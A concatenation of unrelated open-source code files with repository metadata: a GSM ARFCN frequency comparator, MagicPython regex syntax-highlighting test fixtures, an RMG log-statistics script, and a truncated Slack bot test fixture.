"""ARFCN comparison logic."""
from . import arfcn_ref
class ArfcnComparator:
"""Initialization requires no arguments.
There are two attributes you want to pay attention to
uplink_to_arfcn and downlink_to_arfcn, which are generated on
instantiation. You'll use these as the reference input for the
class method get_arfcn_list_by_range. We are currently only building for
GSM850 and PCS1900. To add bands, improve on reference_list components
below.
"""
def __init__(self): # NOQA
self.reference_list = arfcn_ref.GSM_850 + arfcn_ref.PCS_1900
self.uplink_to_arfcn = self.get_up_to_arfcn()
self.downlink_to_arfcn = self.get_down_to_arfcn()
def get_up_to_arfcn(self):
"""Return uplink frequency for ARFCN reference."""
uplink_to_arfcn = {}
for arfcn in self.reference_list:
uplink_to_arfcn[arfcn["uplink"]] = arfcn["arfcn"]
return uplink_to_arfcn
def get_down_to_arfcn(self):
"""Return downlink to ARFCN reference."""
downlink_to_arfcn = {}
for arfcn in self.reference_list:
downlink_to_arfcn[arfcn["downlink"]] = arfcn["arfcn"]
return downlink_to_arfcn
def arfcn_from_uplink_range(self, start, end):
"""Unlikely to ever be used."""
reference = self.uplink_to_arfcn
arfcn_list = ArfcnComparator.get_arfcn_list_by_range(reference,
start, end)
return sorted(arfcn_list)
def arfcn_from_downlink_range(self, start, end):
"""Use this for getting ARFCN list by tower TX."""
reference = self.downlink_to_arfcn
arfcn_list = ArfcnComparator.get_arfcn_list_by_range(reference,
start, end)
return sorted(arfcn_list)
@classmethod
def get_arfcn_list_by_range(cls, reference, start, end):
"""Return list of ARFCNs for a frequency range.
The reference var should look like this:
{frequency: arfcn, frequency: arfcn}
"""
arfcn_list = []
try:
starting = float(start)
ending = float(end)
except ValueError:
msg = "Unable to set float from %s and %s" % (str(start), str(end))
print(msg)
starting = float(0)
ending = float(1)
for freq in reference.items():
target = float(freq[0])
if starting < target < ending:
arfcn_list.append(freq[1])
return arfcn_list
| {
"repo_name": "sitch-io/feed_builder",
"path": "sitch/sitchlib/arfcn_comparator.py",
"copies": "1",
"size": "2589",
"license": "apache-2.0",
"hash": -7162268235586793000,
"line_mean": 35.9857142857,
"line_max": 79,
"alpha_frac": 0.5855542681,
"autogenerated": false,
"ratio": 3.7795620437956203,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.486511631189562,
"avg_score": null,
"num_lines": null
} |
a = rf'fo{{2}}'
a = r'fo{{2}}'
a = r'fo{2}'
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
rf : source.python, storage.type.string.python, string.interpolated.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.interpolated.python, string.regexp.quoted.single.python
fo : source.python, string.interpolated.python, string.regexp.quoted.single.python
{{2}} : keyword.operator.quantifier.regexp, source.python, string.interpolated.python, string.regexp.quoted.single.python
' : punctuation.definition.string.end.python, source.python, string.interpolated.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
fo{ : source.python, string.regexp.quoted.single.python
{2} : keyword.operator.quantifier.regexp, source.python, string.regexp.quoted.single.python
} : source.python, string.regexp.quoted.single.python
' : punctuation.definition.string.end.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
fo : source.python, string.regexp.quoted.single.python
{2} : keyword.operator.quantifier.regexp, source.python, string.regexp.quoted.single.python
' : punctuation.definition.string.end.python, source.python, string.regexp.quoted.single.python
| {
"repo_name": "MagicStack/MagicPython",
"path": "test/regexp/fregexp4.py",
"copies": "1",
"size": "2163",
"license": "mit",
"hash": -8715927094252129000,
"line_mean": 59.0833333333,
"line_max": 137,
"alpha_frac": 0.6680536292,
"autogenerated": false,
"ratio": 3.904332129963899,
"config_test": false,
"has_no_keywords": true,
"few_assignments": false,
"quality_score": 0.5072385759163899,
"avg_score": null,
"num_lines": null
} |
a = r'foo#not a comment'
a = r'''
(?x) # multi-line regexp
foo # comment
'''
a = R'''
(?x) # not a
foo # comment
'''
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
foo#not a comment : source.python, string.regexp.quoted.single.python
' : punctuation.definition.string.end.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.multi.python
''' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.multi.python
: source.python, string.regexp.quoted.multi.python
(?x) : source.python, storage.modifier.flag.regexp, string.regexp.quoted.multi.python
: source.python, string.regexp.quoted.multi.python
# : comment.line.number-sign.python, punctuation.definition.comment.python, source.python, string.regexp.quoted.multi.python
multi-line regexp : comment.line.number-sign.python, source.python, string.regexp.quoted.multi.python
foo : source.python, string.regexp.quoted.multi.python
# : comment.line.number-sign.python, punctuation.definition.comment.python, source.python, string.regexp.quoted.multi.python
comment : comment.line.number-sign.python, source.python, string.regexp.quoted.multi.python
''' : punctuation.definition.string.end.python, source.python, string.regexp.quoted.multi.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
R : source.python, storage.type.string.python, string.quoted.raw.multi.python
''' : punctuation.definition.string.begin.python, source.python, string.quoted.raw.multi.python
(?x) # not a : source.python, string.quoted.raw.multi.python
foo # comment : source.python, string.quoted.raw.multi.python
''' : punctuation.definition.string.end.python, source.python, string.quoted.raw.multi.python
| {
"repo_name": "MagicStack/MagicPython",
"path": "test/regexp/python5.py",
"copies": "1",
"size": "2539",
"license": "mit",
"hash": 4918201777474779000,
"line_mean": 56.7045454545,
"line_max": 136,
"alpha_frac": 0.6538007089,
"autogenerated": false,
"ratio": 3.91820987654321,
"config_test": false,
"has_no_keywords": true,
"few_assignments": false,
"quality_score": 0.507201058544321,
"avg_score": null,
"num_lines": null
} |
a = r'(<\' for
a = r"(<\" for
a = r'[<\' for
a = r"[<\" for
a = r'(?=\' for
a = r"(?=\" for
a = r'(?P<a>\' for
a = r"(?P<a>\" for
a = r'(?<!a\' for
a = r"(?<!a\" for
return some
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
( : punctuation.parenthesis.begin.regexp, source.python, string.regexp.quoted.single.python, support.other.parenthesis.regexp
< : source.python, string.regexp.quoted.single.python
\' : constant.character.escape.regexp, source.python, string.regexp.quoted.single.python
for : source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
" : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
( : punctuation.parenthesis.begin.regexp, source.python, string.regexp.quoted.single.python, support.other.parenthesis.regexp
< : source.python, string.regexp.quoted.single.python
\" : constant.character.escape.regexp, source.python, string.regexp.quoted.single.python
for : source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
[ : constant.other.set.regexp, meta.character.set.regexp, punctuation.character.set.begin.regexp, source.python, string.regexp.quoted.single.python
< : constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
\' : constant.character.escape.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
: constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
f : constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
o : constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
r : constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
" : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
[ : constant.other.set.regexp, meta.character.set.regexp, punctuation.character.set.begin.regexp, source.python, string.regexp.quoted.single.python
< : constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
\" : constant.character.escape.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
: constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
f : constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
o : constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
r : constant.character.set.regexp, meta.character.set.regexp, source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
( : keyword.operator.lookahead.regexp, punctuation.parenthesis.lookahead.begin.regexp, source.python, string.regexp.quoted.single.python
?= : keyword.operator.lookahead.regexp, source.python, string.regexp.quoted.single.python
\' : constant.character.escape.regexp, source.python, string.regexp.quoted.single.python
for : source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
" : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
( : keyword.operator.lookahead.regexp, punctuation.parenthesis.lookahead.begin.regexp, source.python, string.regexp.quoted.single.python
?= : keyword.operator.lookahead.regexp, source.python, string.regexp.quoted.single.python
\" : constant.character.escape.regexp, source.python, string.regexp.quoted.single.python
for : source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
( : meta.named.regexp, punctuation.parenthesis.named.begin.regexp, source.python, string.regexp.quoted.single.python, support.other.parenthesis.regexp
?P<a> : entity.name.tag.named.group.regexp, meta.named.regexp, source.python, string.regexp.quoted.single.python
\' : constant.character.escape.regexp, meta.named.regexp, source.python, string.regexp.quoted.single.python
for : meta.named.regexp, source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
" : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
( : meta.named.regexp, punctuation.parenthesis.named.begin.regexp, source.python, string.regexp.quoted.single.python, support.other.parenthesis.regexp
?P<a> : entity.name.tag.named.group.regexp, meta.named.regexp, source.python, string.regexp.quoted.single.python
\" : constant.character.escape.regexp, meta.named.regexp, source.python, string.regexp.quoted.single.python
for : meta.named.regexp, source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
( : keyword.operator.lookbehind.negative.regexp, punctuation.parenthesis.lookbehind.begin.regexp, source.python, string.regexp.quoted.single.python
?<! : keyword.operator.lookbehind.negative.regexp, source.python, string.regexp.quoted.single.python
a : source.python, string.regexp.quoted.single.python
\' : constant.character.escape.regexp, source.python, string.regexp.quoted.single.python
for : source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
" : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
( : keyword.operator.lookbehind.negative.regexp, punctuation.parenthesis.lookbehind.begin.regexp, source.python, string.regexp.quoted.single.python
?<! : keyword.operator.lookbehind.negative.regexp, source.python, string.regexp.quoted.single.python
a : source.python, string.regexp.quoted.single.python
\" : constant.character.escape.regexp, source.python, string.regexp.quoted.single.python
for : source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
return : keyword.control.flow.python, source.python
: source.python
some : source.python
| {
"repo_name": "MagicStack/MagicPython",
"path": "test/regexp/python10.py",
"copies": "1",
"size": "10248",
"license": "mit",
"hash": -3107929691211272700,
"line_mean": 74.9111111111,
"line_max": 162,
"alpha_frac": 0.6820843091,
"autogenerated": false,
"ratio": 3.9521789433089087,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 135
} |
# arg[1]: RMG log file from a run with QM with the "both" option
# arg[2]: 0 for "check"; 1 for "confirm"
if __name__ == "__main__":
import sys
#Example output:
#*****Attempt #5 on species VLEXMQNIVAQEHV-UHFFFAOYAI (InChI=1/C10H14/c1-2-3-4-7-10-8-5-6-9-10/h2,7,10H,5-6,8-9H2,1H3) failed. Will attempt a new keyword.
#*****Imaginary freqencies found:
#*****Attempt #6 on species VLEXMQNIVAQEHV-UHFFFAOYAI (InChI=1/C10H14/c1-2-3-4-7-10-8-5-6-9-10/h2,7,10H,5-6,8-9H2,1H3) failed. Will attempt a new keyword.
#*****Imaginary freqencies found:
#*****Attempt #7 on species VLEXMQNIVAQEHV-UHFFFAOYAI (InChI=1/C10H14/c1-2-3-4-7-10-8-5-6-9-10/h2,7,10H,5-6,8-9H2,1H3) failed. Will attempt a new keyword.
#*****Imaginary freqencies found:
#*****Attempt #8 on species VLEXMQNIVAQEHV-UHFFFAOYAI (InChI=1/C10H14/c1-2-3-4-7-10-8-5-6-9-10/h2,7,10H,5-6,8-9H2,1H3) failed. Will attempt a new keyword.
#*****Imaginary freqencies found:
#*****Attempt #9 on species VLEXMQNIVAQEHV-UHFFFAOYAI (InChI=1/C10H14/c1-2-3-4-7-10-8-5-6-9-10/h2,7,10H,5-6,8-9H2,1H3) failed. Will attempt a new keyword.
#*****Imaginary freqencies found:
#*****Final MOPAC attempt (#10) on species VLEXMQNIVAQEHV-UHFFFAOYAI (InChI=1/C10H14/c1-2-3-4-7-10-8-5-6-9-10/h2,7,10H,5-6,8-9H2,1H3) failed. Trying to use Gaussian.
#*****Attempt #0 on species VLEXMQNIVAQEHV-UHFFFAOYAI (InChI=1/C10H14/c1-2-3-4-7-10-8-5-6-9-10/h2,7,10H,5-6,8-9H2,1H3) failed. Will attempt a new keyword.
#Attempt #1 on species VLEXMQNIVAQEHV-UHFFFAOYAI (InChI=1/C10H14/c1-2-3-4-7-10-8-5-6-9-10/h2,7,10H,5-6,8-9H2,1H3) succeeded.
#Point group: Cs
#Thermo for VLEXMQNIVAQEHV-UHFFFAOYAI: 48.57 112.68 41.61 54.59 66.16 75.82 90.6 101.25 117.34
#HBI-based thermo for OSUAYNIVCVOFCQ-UHFFFAOYATmult3(InChI=1/C10H12/c1-2-3-4-7-10-8-5-6-9-10/h2,7H,1,5-6,8-9H2/mult3): 115.97 106.43 39.2 51.65 62.64 71.73 85.48 95.24 110.3
#Attempt #1 on species DVGVDWBLASWERI-UHFFFAOYAM (InChI=1/C10H14/c1-2-3-4-7-10-8-5-6-9-10/h2,10H,1,5-9H2) succeeded.
#Point group: C1
#Thermo for DVGVDWBLASWERI-UHFFFAOYAM: 39.96 104.61 40.87 54.22 66.0 75.78 90.65 101.32 117.41
#HBI-based thermo for OSUAYNIVCVOFCQ-UHFFFAOYATmult3(InChI=1/C10H12/c1-2-3-4-7-10-8-5-6-9-10/h2,7H,1,5-6,8-9H2/mult3): 119.26 109.4 39.5 50.54 60.7 69.44 82.99 92.81 108.53
#***For species CPGPQFYAGKHQTB-UHFFFAOYAZ an OpenBabel-based check suggests the optimized three-dimensional InChI (InChI=1/C5H6/c1-5-3-2-4-5/h2-4H2) does not match the intended (unmodified) InChI (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2). Will retry connectivity check with MoleCoor
#***For species CPGPQFYAGKHQTB-UHFFFAOYAZ a MoleCoor-based check suggests the optimized three-dimensional InChI (InChI=1/C5H6/c1-5-3-2-4-5/h2-4H2) does not match the intended (unmodified) InChI (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2).
#*****Attempt #1 on species CPGPQFYAGKHQTB-UHFFFAOYAZ (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2) failed. Will attempt a new keyword.
#***For species CPGPQFYAGKHQTB-UHFFFAOYAZ an OpenBabel-based check suggests the optimized three-dimensional InChI (InChI=1/C5H6/c1-5-3-2-4-5/h2-4H2) does not match the intended (unmodified) InChI (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2). Will retry connectivity check with MoleCoor
#***For species CPGPQFYAGKHQTB-UHFFFAOYAZ a MoleCoor-based check suggests the optimized three-dimensional InChI (InChI=1/C5H6/c1-5-3-2-4-5/h2-4H2) does not match the intended (unmodified) InChI (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2).
#*****Attempt #2 on species CPGPQFYAGKHQTB-UHFFFAOYAZ (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2) failed. Will attempt a new keyword.
#***For species CPGPQFYAGKHQTB-UHFFFAOYAZ an OpenBabel-based check suggests the optimized three-dimensional InChI (InChI=1/C5H6/c1-5-3-2-4-5/h2-4H2) does not match the intended (unmodified) InChI (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2). Will retry connectivity check with MoleCoor
#***For species CPGPQFYAGKHQTB-UHFFFAOYAZ a MoleCoor-based check suggests the optimized three-dimensional InChI (InChI=1/C5H6/c1-5-3-2-4-5/h2-4H2) does not match the intended (unmodified) InChI (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2).
#*****Attempt #3 on species CPGPQFYAGKHQTB-UHFFFAOYAZ (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2) failed. Will attempt a new keyword.
#Attempt #4 on species CPGPQFYAGKHQTB-UHFFFAOYAZ (InChI=1/C5H6/c1-2-4-5-3-1/h1-3H2) succeeded.
#Point group: C2v
#Thermo for CPGPQFYAGKHQTB-UHFFFAOYAZ: 127.6 67.2 18.37 24.32 29.54 33.86 40.39 45.06 52.1
MopacKeywords = 10
GaussianKeywords = 36
if(int(sys.argv[2])==1):#0 for check, 1 for confirm
confirm = True
else:
confirm = False
#initialize counters
preexistMopac=0
preexistGaussian=0
preexistMopacList=[]
preexistGaussianList=[]
masterList=[]
connMismatchList=[]
connMismatchBackupFixList=[]
newMopacArray=[0 for x in range(MopacKeywords)]
newGaussianArray=[0 for x in range(GaussianKeywords)]
newMopacConnFixArray=[0 for x in range(MopacKeywords)]
newGaussianConnFixArray=[0 for x in range(GaussianKeywords)]
newFail = 0 #note this does not necessarily correspond to newFailList length; it will increase due to repeated attempts on the same molecule
newFailList=[]
connMismatchSpeciesRetryList=[]
connMismatchFailList=[]
connMismatchBackupFixesEarlierFail=0
connMismatchBackupFixesOnFirstPrimaryFail=0
#read in the file
iin=open(sys.argv[1], 'r')
line = iin.readline()
while line != '':#'' marks end of file
#note: "***For species" should only be printed with check=confirm, so we don't need to check for that flag
if ('Attempt #1' in line or (line.startswith('***For species'))):#the beginning of a block for a new attempt
#print line
connMismatchFlag=False
#dontreadmore=False
#begin block (****used three places****)
if (line.startswith('***For species')):
line = iin.readline()#read the next line to see whether the backup test failed also (in which case the next line would also start with '***For species'); otherwise, this should get to the attempt line or Warning line in the case of check
if (not line.startswith('***For species')):#the case was fixed by the backup method
inchikey = line.split()[2]
if inchikey not in connMismatchBackupFixList:
connMismatchBackupFixList.append(inchikey)
if connMismatchFlag:
connMismatchBackupFixesEarlierFail=connMismatchBackupFixesEarlierFail+1
else:
connMismatchBackupFixesOnFirstPrimaryFail=connMismatchBackupFixesOnFirstPrimaryFail+1
line = iin.readline()#read the next line...should be 'For species' (without ***)
else:#else, the case was a genuine mismatch
if (not connMismatchFlag):
inchikey = line.split()[2]
if inchikey not in connMismatchSpeciesRetryList: connMismatchSpeciesRetryList.append(inchikey)
connMismatchFlag=True
if not confirm:#read the next two lines to get to the Attempt line, (there will be a warning line)
line = iin.readline()
#at the this point, line should contain the warning
if not line.startswith('Warning: Connectivity in quantum result for'):
print 'Algorithm error 0a:'+line
inchikey = line.split()[6]
if inchikey not in connMismatchList: connMismatchList.append(inchikey)
line = iin.readline()
else:#read the next line to get to the Attempt line
line = iin.readline()
#end block
attemptCounter=1
#at the end of here, line should contain "Attempt #1" (for confirm) (but only if there were no old (unconfirmed) files in QMfiles at the start of the run) or Pre-existing... or Attempt #1 (for check)
if confirm:
#read until the line contains "pre-existing successful" or "Attempt #1"
while 'Attempt #1' not in line and not line.startswith('Pre-existing successful'):
line = iin.readline()
else:
if 'Attempt #1' not in line and not line.startswith('Pre-existing successful'):
print 'Algorithm error 1:'+ line
if (line.startswith('Pre-existing successful')):#a pre-existing successful read (following an (at least partial) mismatch
if (line.startswith('Pre-existing successful MOPAC')):
preexistMopac=preexistMopac+1
inchikey = line.split()[6]
if inchikey not in preexistMopacList: preexistMopacList.append(inchikey)
if inchikey not in masterList: masterList.append(inchikey)
else:
preexistGaussian=preexistGaussian+1
inchikey = line.split()[5]
if inchikey not in preexistGaussianList: preexistGaussianList.append(inchikey)
if inchikey not in masterList: masterList.append(inchikey)
line=iin.readline()
else:#the Attempt #1 case
while (not line.startswith('Attempt') and not line.startswith('*****Final attempt') and not line == ''):#this loop gets to the successful attempt or the last attempt, counting the number of intermediate failed attempts in the process
line = iin.readline()
#begin block
if (line.startswith('***For species')):
line = iin.readline()#read the next line to see whether the backup test failed also (in which case the next line would also start with '***For species'); otherwise, this should get to the attempt line or Warning line in the case of check
if (not line.startswith('***For species')):#the case was fixed by the backup method
inchikey = line.split()[2]
if inchikey not in connMismatchBackupFixList:
connMismatchBackupFixList.append(inchikey)
if connMismatchFlag:
connMismatchBackupFixesEarlierFail=connMismatchBackupFixesEarlierFail+1
else:
connMismatchBackupFixesOnFirstPrimaryFail=connMismatchBackupFixesOnFirstPrimaryFail+1
line = iin.readline()#read the next line...should be 'For species' (without ***)
else:#else, the case was a genuine mismatch
if (not connMismatchFlag):
inchikey = line.split()[2]
if inchikey not in connMismatchSpeciesRetryList: connMismatchSpeciesRetryList.append(inchikey)
connMismatchFlag=True
if not confirm:#read the next two lines to get to the Attempt line, (there will be a warning line)
line = iin.readline()
#at the this point, line should contain the warning
if not line.startswith('Warning: Connectivity in quantum result for'):
print 'Algorithm error 0b:'+line
inchikey = line.split()[6]
if inchikey not in connMismatchList: connMismatchList.append(inchikey)
line = iin.readline()
else:#read the next line to get to the Attempt line
line = iin.readline()
#at the this point, line should contain the next attempt"#"
if '#' not in line:
print 'Algorithm error 2:'+line
#end block
while '#' not in line and line != '':#get to the next attempt line or "for species" line, ignoring, for example, imaginary frequencies warnings
line = iin.readline()
#begin block
if (line.startswith('***For species')):
line = iin.readline()#read the next line to see whether the backup test failed also (in which case the next line would also start with '***For species'); otherwise, this should get to the attempt line or Warning line in the case of check
if (not line.startswith('***For species')):#the case was fixed by the backup method
inchikey = line.split()[2]
if inchikey not in connMismatchBackupFixList:
connMismatchBackupFixList.append(inchikey)
if connMismatchFlag:
connMismatchBackupFixesEarlierFail=connMismatchBackupFixesEarlierFail+1
else:
connMismatchBackupFixesOnFirstPrimaryFail=connMismatchBackupFixesOnFirstPrimaryFail+1
line = iin.readline()#read the next line...should be 'For species' (without ***)
else:#else, the case was a genuine mismatch
if (not connMismatchFlag):
inchikey = line.split()[2]
if inchikey not in connMismatchSpeciesRetryList: connMismatchSpeciesRetryList.append(inchikey)
connMismatchFlag=True
if not confirm:#read the next two lines to get to the Attempt line, (there will be a warning line)
line = iin.readline()
#at the this point, line should contain the warning
if not line.startswith('Warning: Connectivity in quantum result for'):
print 'Algorithm error 0c:'+line
inchikey = line.split()[6]
if inchikey not in connMismatchList: connMismatchList.append(inchikey)
line = iin.readline()
else:#read the next line to get to the Attempt line
line = iin.readline()
#at the this point, line should contain the next attempt"#"
if '#' not in line:
print 'Algorithm error 3:'+line
#end block
attemptCounter=attemptCounter+1 #increment attempt# at each occurence of #
if (line.startswith('Attempt')):
inchikey = line.split()[4]
if inchikey not in masterList: masterList.append(inchikey)
if attemptCounter > MopacKeywords :
newGaussianArray[attemptCounter-MopacKeywords -2] = newGaussianArray[attemptCounter-MopacKeywords -2]+1 # note we subtract 2 from the index rather than 1 since when the program switches to Gaussian, it prints an extra spurious attempt #0
if connMismatchFlag:
newGaussianConnFixArray[attemptCounter-MopacKeywords -2] = newGaussianConnFixArray[attemptCounter-MopacKeywords -2]+1
else:
newMopacArray[attemptCounter-1] = newMopacArray[attemptCounter-1] + 1
if connMismatchFlag:
newMopacConnFixArray[attemptCounter-1] = newMopacConnFixArray[attemptCounter-1]+1
elif(line != ''):#starts with '*****Final attempt'
newFail = newFail+1
inchikey = line.split()[5]
if inchikey not in newFailList: newFailList.append(inchikey)
if (connMismatchFlag):
if inchikey not in connMismatchFailList: connMismatchFailList.append(inchikey)
line = iin.readline()
elif (line.startswith('Pre-existing successful')):#a pre-existing successful read
if (line.startswith('Pre-existing successful MOPAC')):
preexistMopac=preexistMopac+1
inchikey = line.split()[6]
if inchikey not in preexistMopacList: preexistMopacList.append(inchikey)
if inchikey not in masterList: masterList.append(inchikey)
else:
preexistGaussian=preexistGaussian+1
inchikey = line.split()[5]
if inchikey not in preexistGaussianList: preexistGaussianList.append(inchikey)
if inchikey not in masterList: masterList.append(inchikey)
line=iin.readline()
else:
line=iin.readline()
iin.close()
#print the results
print 'Number of species that completely failed QMTP = '+str(len(newFailList))
if confirm: print 'Number of the complete failures that were due to apparent connectivity mismatches (CheckConnectivity: confirm) = '+ str(len(connMismatchFailList))
if confirm: print 'Number of species that were retried due to apparent connectivity mismatches (CheckConnectivity: confirm) = '+str(len(connMismatchSpeciesRetryList))
if not confirm: print 'Number of unique species with connectivity warnings (CheckConnectivity: check) = '+str(len(connMismatchList))
print 'Number of cases where backup connectivity check identified a match missed by the primary method (early/late) = '+str(len(connMismatchBackupFixList))+' ('+str(connMismatchBackupFixesOnFirstPrimaryFail)+'/'+str(connMismatchBackupFixesEarlierFail)+')'#this could double-count for "check" case
print 'Number of reads of pre-existing successful MOPAC results = '+ str(preexistMopac)
print 'Number of reads of pre-existing successful Gaussian results = '+ str(preexistGaussian)
print 'Number of unique pre-existing MOPAC results read = '+ str(len(preexistMopacList))
print 'Number of unique pre-existing Gaussian results read = '+str(len(preexistGaussianList))
print 'Number of species that finally succeeded at each attempt #:'
newMopacTotal=0
newGaussianTotal=0
mopacTotalAttempts=newFail*MopacKeywords
gaussianTotalAttempts=newFail*GaussianKeywords
for i in range(len(newMopacArray)):
print 'Attempt #'+str(i+1)+' (MOPAC) : '+str(newMopacArray[i])
newMopacTotal = newMopacTotal + newMopacArray[i]
mopacTotalAttempts = mopacTotalAttempts + (i+1)*newMopacArray[i]
for i in range(len(newGaussianArray)):
print 'Attempt #'+str(i+1)+' (Gaussian) : '+str(newGaussianArray[i])
newGaussianTotal = newGaussianTotal + newGaussianArray[i]
gaussianTotalAttempts = gaussianTotalAttempts + (i+1)*newGaussianArray[i]
mopacTotalAttempts = mopacTotalAttempts + MopacKeywords*newGaussianArray[i]
if confirm:
print 'Number of species with connectivity apparently fixed at each attempt #:'
for i in range(len(newMopacConnFixArray)):
print 'Attempt #'+str(i+1)+' (MOPAC) : '+str(newMopacConnFixArray[i])
for i in range(len(newGaussianConnFixArray)):
print 'Attempt #'+str(i+1)+' (Gaussian) : '+str(newGaussianConnFixArray[i])
print 'Number of species with new successful MOPAC results = ' + str(newMopacTotal)
print 'Number of species with new successful Gaussian results = ' + str(newGaussianTotal)
print 'Number of MOPAC attempts = ' + str(mopacTotalAttempts) #this will only include all "sets" of failures for the molecule (i.e. if the molecule is encountered again and retried, this will also be counted)
print 'Number of Gaussian attempts = ' + str(gaussianTotalAttempts)#this will only include all "sets" of failures for the molecule (i.e. if the molecule is encountered again and retried, this will also be counted)
print 'Total number of unique species with QMTP results (pre-existing and/or new) = ' + str(len(masterList)) | {
"repo_name": "enochd/RMG-Java",
"path": "scripts/QMTPstats.py",
"copies": "11",
"size": "17345",
"license": "mit",
"hash": -7447140406291198000,
"line_mean": 65.972972973,
"line_max": 297,
"alpha_frac": 0.7289132315,
"autogenerated": false,
"ratio": 2.9669859733150874,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9195899204815088,
"avg_score": null,
"num_lines": null
} |
arg_bot_with_arg = {"token": "slacktoken123",
"team_id": "team123",
"team_domain": "teamdomain",
"channel_id": "channelid",
"channel_name": "directmes1N8L",
"user_name": "derp",
"command": "/arg_bot",
"subcommand": "arg_bot",
"args": "derp",
"text": "derp"}
arg_bot_with_no_args = {"token": "slacktoken123",
"team_id": "team123",
"team_domain": "teamdomain",
"channel_id": "channelid",
"channel_name": "directmes1N8L",
"user_name": "derp",
"command": "/arg_bot",
"subcommand": "arg_bot",
"args": "",
"text": ""}
no_arg_bot_without_arg = {"token": "slacktoken123",
"team_id": "team123",
"team_domain": "teamdomain",
"channel_id": "channelid",
"channel_name": "directmes1N8L",
"user_name": "derp",
"command": "/no_arg_bot",
"subcommand": "no_arg_bot",
"args": "",
